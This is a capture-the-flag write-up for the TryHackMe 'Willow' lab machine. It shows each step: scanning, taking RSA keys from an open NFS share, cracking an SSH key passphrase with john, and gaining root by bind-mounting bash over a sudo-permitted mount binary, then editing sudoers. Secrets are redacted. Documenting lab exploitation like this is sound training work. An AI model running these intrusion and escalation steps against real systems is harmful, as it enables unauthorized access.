TryHackMe: Willow by MuirlandOracle

What lies under the Willow Tree? Grab the flags from the Willow

Enumeration

Let's add to /etc/hosts and run rustscan

╰─⠠⠵ rustscan -a willow --ulimit 10000 -- -sC -sV -oA willow -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.30.196:22
Open 10.10.30.196:80
Open 10.10.30.196:111
Open 10.10.30.196:2049
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-03 20:03 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:03
Completed NSE at 20:03, 0.00s elapsed
Initiating Ping Scan at 20:03
Scanning 10.10.30.196 [2 ports]
Completed Ping Scan at 20:03, 0.04s elapsed (1 total hosts)
Initiating Connect Scan at 20:03
Scanning willow (10.10.30.196) [4 ports]
Discovered open port 22/tcp on 10.10.30.196
Discovered open port 111/tcp on 10.10.30.196
Discovered open port 80/tcp on 10.10.30.196
Discovered open port 2049/tcp on 10.10.30.196
Completed Connect Scan at 20:03, 0.03s elapsed (4 total ports)
Initiating Service scan at 20:03
Scanning 4 services on willow (10.10.30.196)
Completed Service scan at 20:04, 6.09s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.30.196.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 1.45s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.18s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Nmap scan report for willow (10.10.30.196)
Host is up, received conn-refused (0.034s latency).
Scanned at 2021-04-03 20:03:55 BST for 8s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 43:b0:87:cd:e5:54:09:b1:c1:1e:78:65:d9:78:5e:1e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJHkiuOeIrYxoyBBsJX2wpThJlvbsanlxpYXyHspzVIdeGQq3kD/2h1iNbOLwIb/iwS4oaY83OwxMiXImgKm/QgpgffrrKmU41eI/q9i+3NhLfHLvoT5PWupe/UW5Y3/lfmIMD1UXTUJNYiA07w/kHKj9ElQs7EZ2oZ9L5j2/h/lAAAAFQDE3pT3CTjQSOUOqdgu9HBaB6d6FwAAAIAFWqdfVx3v+GNxecTNp1mDb64WZcf2ssl/j+B6hj5W7s++DTY7Ls/i2R0z5bQes+5rMWYvanYFyWYEj31qWmrLvluJbJKldG3IttW5WfMzIyOJ11MHGAMP2/ZXZ4w3t8dMMudgBPkXE1uGv+p03A1i+Z6UfvGVv4HrtlCwqCRBywAAAIBpf+5ztR5aSDuZPxe/BURQIBKqDhOVZOt+Zhcc1GEcdukmlfmyH0sSm/3ae4CYLqBgD1zzwwSg4IkPR8wb1wa3G5F+OSYymEoKuxYWYN4LlSe9vrIap/1C/NO+jMQ5ru6WYqBcNdPqHQ4r5I7MzhziLdNIhfBmY076aL2Dr/OsAg==
|   2048 c2:65:91:c8:38:c9:cc:c7:f9:09:20:61:e5:54:bd:cf (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0/BxHjpZXU3EhwOMURG/xIJno/fZBBw2tntPhQMsA+L6YoVL4IyTKTz6SGM6BcX9622CGutBiO0pc0vhGlf9v/4cUB7My3d1r3t3EkNF0SaKAmAZLm8QOFbmS/TyHy9wF5TGJLunz5cN3NdGIz3Bz2GHHouicRo/vopYmHxjItfVgVUD2u+e5Gkw7u+U1BxZOrQDlaUS41AJvZm9Pk0pn2hWXeGTCJu8oyCqaEi/u8Wu7Ylp/t15NjEpiDpRp2LH9ctB3EG50LL+ti2o8/U652wIoNhnoF33eI6HJget9jvSC03oOx5r6NqHbOn94kVAUjFbYzK716dBa+I5jocHr
|   256 bf:3e:4b:3d:78:b6:79:41:f4:7d:90:63:5e:fb:2a:40 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIW2cLhyEIs7aEuL5e/SGCx5HsLX1a1GfgE/YBPGXiaFt/AkVFA3leapIvX+CD5wc7wCKGDToBgx6bkIY9vb0T0=
|   256 2c:c8:87:4a:d8:f6:4c:c3:03:8d:4c:09:22:83:66:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOsXsk2l13dc4bQlT0wYP6/4gpeoTx5IfVvOBF++ClPu
80/tcp   open  http    syn-ack Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Recovery Page
111/tcp  open  rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      48300/udp6  mountd
|   100005  1,2,3      51380/tcp   mountd
|   100005  1,2,3      51516/udp   mountd
|   100005  1,2,3      55854/tcp6  mountd
|   100021  1,3,4      37023/tcp6  nlockmgr
|   100021  1,3,4      47964/udp6  nlockmgr
|   100021  1,3,4      54419/tcp   nlockmgr
|   100021  1,3,4      54556/udp   nlockmgr
|   100024  1          33277/tcp6  status
|   100024  1          43108/tcp   status
|   100024  1          47863/udp   status
|   100024  1          58992/udp6  status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
2049/tcp open  nfs_acl syn-ack 2-3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:04
Completed NSE at 20:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.25 seconds

22/ssh

No cred's yet so let's move on.

80/http


OK, that is random and looks like hex so let's throw it into CyberChef.

Hey Willow, here's your SSH Private key -- you know where the decryption key is!
2367 2367 2367 2367 2367 9709 8600 28638 18410 1735 33029 16186 28374 37248 33029 26842 [REDACTED].................

Hey Willow, here's your SSH Private key -- you know where the decryption key is!

Hmmm, ok so we have encrypted key but need to find the decryption. Let's throw a gobuster at the webserver when we move on...

╰─⠠⠵ gobuster dir -u http://willow/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt -x txt,html,bak,zip,tar.gz,gz,php,sql,db,php       
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://willow/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              bak,gz,db,txt,html,zip,tar.gz,php,sql
[+] Timeout:                 10s
===============================================================
2021/04/03 20:11:05 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 20474]

111/rpc

List of services

2049/nfs

Let's take a look at what has been exported.

╰─⠠⠵ showmount -e willow
Export list for willow:
/var/failsafe *

Ok let's mount it and take a look inside.

╰─⠠⠵ mkdir m
╰─⠠⠵ sudo mount willow:/var/failsafe m
╰─⠠⠵ find m -exec ls -l '{}' \;
total 4
-rw-r--r-- 1 root root 62 Jan 30  2020 rsa_keys
-rw-r--r-- 1 root root 62 Jan 30  2020 m/rsa_keys
╰─○ cat rsa_keys 
Public Key Pair: ([REDACTED])
Private Key Pair: ([REDACTED])

Ok so that looks like the decryption keys we need.

User Flag:

Using the key above and https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html we can decrypt the key.

However we can see that the key is protected by a passphrase.

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,[REDACTED]

Using ssh2john we should be able to crack this.

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/ssh2john.py id_willow > id.hash

╰─⠠⠵ /opt/john-1.9.0-jumbo-1/run/john id.hash --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED]       (id_willow)
Warning: Only 1 candidate left, minimum 8 needed for performance.
Session completed

Using this we can now ssh to the box.

╰─⠠⠵ chmod 400 id_willow 

╰─⠠⠵ ssh -i id_willow willow@willow
The authenticity of host 'willow (10.10.30.196)' can't be established.
ECDSA key fingerprint is SHA256:6caf+NZ1ecyCIYr6PD09286by/SsrR4UdA9DZR/SgD4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'willow,10.10.30.196' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_willow': 




	"O take me in your arms, love
	For keen doth the wind blow
	O take me in your arms, love
	For bitter is my deep woe."
		 -The Willow Tree, English Folksong




willow@willow-tree:~$ 

The user flag look to be an image so let's copy it back to our machine for a look

╰─⠠⠵ scp -i id_willow willow@willow:user.jpg .
Enter passphrase for key 'id_willow': 
user.jpg 

Using tesseract we can grab the text out of the image

╰─⠠⠵ tesseract user.jpg -
THM{[REDACTED]}

Root Flag:

OK, now we have the user flag let's move on to privesc. Checking sudo -l we get

willow@willow-tree:~$ sudo -l
Matching Defaults entries for willow on willow-tree:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User willow may run the following commands on willow-tree:
    (ALL : ALL) NOPASSWD: /bin/mount /dev/*

We can use mount to mount anything under /dev/ so lets abuse this..

willow@willow-tree:~/t$ cp /bin/bash /dev/shm/
willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/bash /bin/mount -o force,bind
willow@willow-tree:~/t$ echo "bash" > /dev/shm/shell
willow@willow-tree:~/t$ sudo /bin/mount /dev/shm/shell 
root@willow-tree:/home/willow/t# id
uid=0(root) gid=0(root) groups=0(root)

OK we are root so lets take a look at the flag

root@willow-tree:~# cat root.txt 
This would be too easy, don't you think? I actually gave you the root flag some time ago.
You've got my password now -- go find your flag!

Damn, I wonder if I have rooted this in a different way than the author intended ? Let's see if we can find the flag atleast.

Looking at netstat we can see exim4 listening on `127.0.0.11

root@willow-tree:/var/spool/exim4# netstat -anp | grep "127.0.0.1"
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1004/exim4      
udp        0      0 127.0.0.1:701           0.0.0.0:*                           525/rpc.statd   
root@willow-tree:/var/spool/exim4# cd /var/log/exim4/

Jump across to /var/mail/mail we can see a cronjob is sending mail.

From root@localhost.localdomain Wed Feb 05 22:41:13 2020
Return-path: <root@localhost.localdomain>
Envelope-to: root@localhost.localdomain
Delivery-date: Wed, 05 Feb 2020 22:41:13 +0000
Received: from root by willow-tree with local (Exim 4.84)
        (envelope-from <root@localhost.localdomain>)
        id 1izTM9-00008v-Jf
        for root@localhost.localdomain; Wed, 05 Feb 2020 22:41:13 +0000
From: root@localhost.localdomain (Cron Daemon)
To: root@localhost.localdomain
Subject: Cron <root@willow-tree> mv /dev/xvda5 /dev/hidden_backup
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <PATH=/usr/bin:/bin>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1izTM9-00008v-Jf@willow-tree>
Date: Wed, 05 Feb 2020 22:41:13 +0000

mv: cannot stat ‘/dev/xvda5’: No such file or directory

As my privesc has broken mount let's edit sudoers and give willow extra permissions with visudo

willow ALL=(ALL:ALL) NOPASSWD: ALL

Now let's drop back down and undo our changes.

willow@willow-tree:~$ sudo umount /bin/mount
willow@willow-tree:~$ sudo mount /dev/hidden_backup /mnt/
willow@willow-tree:~$ ls /mnt/
creds.txt
willow@willow-tree:~$ cat /mnt/creds.txt 
root:[REDACTED]
willow:[REDACTED]

Ok so we have credentials but we still need to find the flag. Looking around the file system I can not find anything that could be the flag.

This would be too easy, don't you think? I actually gave you the root flag some time ago.

Hmmm... Thinking about this cryptic clue the only thing I can think that we were given is the user.jpg.... Trying steghide on this file..

╰─⠠⠵ steghide extract -sf user.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Ok, so looks like there might be something there, trying root's credentials...

╰─⠠⠵ steghide extract -sf user.jpg
Enter passphrase: 
wrote extracted data to "root.txt".

╰─⠠⠵ cat root.txt 
THM{[REDACTED]}

Finally we have root flag! MuirlandOracle's rooms are always a bit tricky and have annoying things this like this ....

Done!!

That was an interesting room, think the privesc I used was different to what was expected.